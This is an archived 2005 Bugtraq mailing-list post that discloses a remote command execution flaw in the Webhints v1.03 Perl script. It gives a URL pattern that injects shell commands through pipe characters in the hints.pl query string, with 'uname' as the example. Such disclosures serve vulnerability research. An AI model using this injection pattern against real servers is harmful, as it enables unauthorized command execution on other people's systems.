[39126] in bugtraq

home help back first fref pref prev next nref lref last post

Webhints v1.03 Remote Command Execution

daemon@ATHENA.MIT.EDU (blahplok@yahoo.com)
Fri Jun 10 14:46:36 2005

Date: 9 Jun 2005 22:36:17 -0000
Message-ID: <20050609223617.11834.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: blahplok@yahoo.com
To: bugtraq@securityfocus.com

Hi

This is a Vulnerablity in Webhints Scripts and user can Execute command by it .

www.example.com/hints.pl?|c0mmand|

Example : www.example.com/hints.pl?|uname|

Best Regards


home help back first fref pref prev next nref lref last post